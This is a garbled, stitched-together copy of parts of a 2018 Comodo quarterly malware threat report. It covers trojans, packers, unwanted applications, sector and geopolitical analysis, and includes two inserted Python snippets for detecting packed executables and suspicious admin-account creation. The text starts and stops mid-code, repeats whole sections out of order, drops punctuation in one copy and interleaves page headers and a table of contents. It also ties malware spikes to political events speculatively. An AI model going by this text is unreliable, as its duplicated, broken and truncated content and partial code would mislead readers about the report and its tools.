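    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPT_HDR_SIZE, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (OPT_HDR_SIZE - 2)
    table, raw, ptr = b"", b"", hdr_end
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0x1000,
                             len(data), ptr, 0, 0, 0, 0, 0x60000020)
        raw += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + opt + table + raw


# Constructed samples: deterministic pseudo-random bytes stand in for
# compressed code; the benign image holds repetitive, low-entropy bytes.
_rng = random.Random(2018)
_HIGH = bytes(_rng.getrandbits(8) for _ in range(4096))
UPX_LIKE = build_pe([("UPX0", b""), ("UPX1", _HIGH), (".rsrc", b"\0" * 256)])
RENAMED = build_pe([(".text", _HIGH), (".data", b"\0" * 512)])
BENIGN = build_pe([(".text", b"\x90" * 3000 + b"\xC3" * 100),
                   (".data", b"Hello, world\0" * 100)])

if __name__ == "__main__":
    for label, img in (("stock UPX", UPX_LIKE), ("renamed packer", RENAMED), ("benign", BENIGN)):
        print(label, assess(img), [(n, round(e, 2)) for n, _, e in parse_sections(img)])
```

The name check is cheap and exact but only catches an unmodified packer; the entropy check survives renaming, which is exactly what a "modified UPX" implies, at the price of false positives on high-entropy legitimate data, so the two are best used together and the threshold calibrated on known-good binaries.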
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but it now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 48 of 73
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for trojans according to Comodo detections.
And this timeline shows when this huge trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for constructors.
And this timeline shows not only that Germany had a serious problem with constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware packers.
This timeline shows that Russia had the most persistent packer problems, while Iran had the highest periodic spikes.
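The section-name and byte-entropy heuristic that defenders use to triage UPX-style packed executables like those described above, as an added example that is not part of the Comodo report. It uses only the Python standard library; `PACKER_SECTION_NAMES`, `HIGH_ENTROPY_THRESHOLD` and `triage` are this example's own names, and the PE image it inspects is a constructed minimal sample, not a real binary.

```python
"""Triage of packed PE files by section name and byte entropy (added example)."""
import math
import random
import struct
from collections import Counter

# Stock section names written by UPX. A modified build (such as MUPX) may
# rename them, which is why the entropy test below is applied independently.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY_THRESHOLD = 7.0  # bits per byte; compressed/encrypted data sits near the 8.0 maximum


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Walk the PE section table and yield (name, raw_bytes_on_disk) per section."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_opt = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_opt  # section headers follow the optional header
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        yield name, image[raw_ptr:raw_ptr + raw_size]


def triage(image: bytes):
    """Return [(section, entropy, reasons)] for sections that look packed."""
    findings = []
    for name, data in pe_sections(image):
        ent = shannon_entropy(data)
        reasons = []
        if name in PACKER_SECTION_NAMES:
            reasons.append("packer section name")
            if not data:
                # UPX0 is the in-memory unpacking destination: zero bytes on disk
                reasons.append("empty on disk, filled at run time")
        if ent >= HIGH_ENTROPY_THRESHOLD:
            reasons.append("high entropy")
        if reasons:
            findings.append((name, round(ent, 2), reasons))
    return findings


def build_sample_pe(sections):
    """Construct a minimal PE image (test input only; no optional header, not loadable)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    offset = e_lfanew + 4 + 20 + 40 * len(sections)  # first raw-data offset
    table, blobs = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIII", name.encode(), len(data), 0, len(data), offset)
        table += b"\0" * 16  # relocation/line-number fields and Characteristics
        blobs += data
        offset += len(data)
    return bytes(dos) + b"PE\0\0" + coff + table + blobs


_rng = random.Random(7)
# Constructed sample: the layout a stock UPX build leaves behind.
SAMPLE_IMAGE = build_sample_pe([
    ("UPX0", b""),  # unpacking destination, nothing on disk
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),  # stands in for the compressed payload
    (".rsrc", b"<resource>" * 64),  # ordinary low-entropy data
])

if __name__ == "__main__":
    for name, ent, reasons in triage(SAMPLE_IMAGE):
        print(f"{name:8s} entropy={ent:.2f} {', '.join(reasons)}")
```

High entropy alone is only a triage signal: legitimate installers and compressed resources score similarly, so confirm a hit by unpacking or behavioral analysis before acting on it.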
5.3.3 Email Flooder
Email flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one email flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual tools are programs that can modify or alter malicious files to avoid detection.
The top virtual tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for virtual tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new and significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 49 of 73
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user, and they can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
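A defender-side way to catch the behaviour Microsoft attributes to Starter is to correlate two Windows Security log events: 4720 (a user account was created) followed shortly by 4732 (a member was added to a security-enabled local group) where the group is Administrators. The Python below is an added example, not Comodo's or Microsoft's code; the event records are constructed samples with invented SIDs, and the "Remote Service Account" name is reused from the text above purely as sample data.

```python
"""Detect a freshly created local account that is promoted to Administrators
within a short window, the pattern described for the Starter trojan.
Added example; all events below are constructed samples, not real telemetry."""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
DEFAULT_WINDOW = timedelta(minutes=10)

# Constructed sample events. Field names follow the Security log's XML fields
# (TargetSid is the new account in 4720 and the group in 4732; MemberSid is the
# account being added in 4732). Every value is invented for this example.
SAMPLE_EVENTS = [
    # Pair 1: account created, then made an administrator two seconds later.
    {"TimeCreated": "2018-06-01T09:00:01", "EventID": 4720, "SubjectUserName": "alice",
     "TargetUserName": "Remote Service Account", "TargetSid": "S-1-5-21-1-1-1-1105"},
    {"TimeCreated": "2018-06-01T09:00:03", "EventID": 4732, "SubjectUserName": "alice",
     "MemberSid": "S-1-5-21-1-1-1-1105", "TargetSid": ADMINISTRATORS_SID},
    # Pair 2: helpdesk creates a user who is elevated a full day later (outside the window).
    {"TimeCreated": "2018-06-01T10:15:00", "EventID": 4720, "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1-1-1-1106"},
    {"TimeCreated": "2018-06-02T10:15:00", "EventID": 4732, "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1-1-1-1106", "TargetSid": ADMINISTRATORS_SID},
    # Unrelated: an existing account joins Remote Desktop Users, not Administrators.
    {"TimeCreated": "2018-06-01T11:00:00", "EventID": 4732, "SubjectUserName": "bob",
     "MemberSid": "S-1-5-21-1-1-1-1050", "TargetSid": "S-1-5-32-555"},
]


def find_new_admin_accounts(events, window=DEFAULT_WINDOW):
    """Return one alert per account that was created (4720) and then added to
    Administrators (4732) within `window`. Input order does not matter."""
    created = {}   # new account SID -> (timestamp, 4720 event)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        when = datetime.fromisoformat(ev["TimeCreated"])
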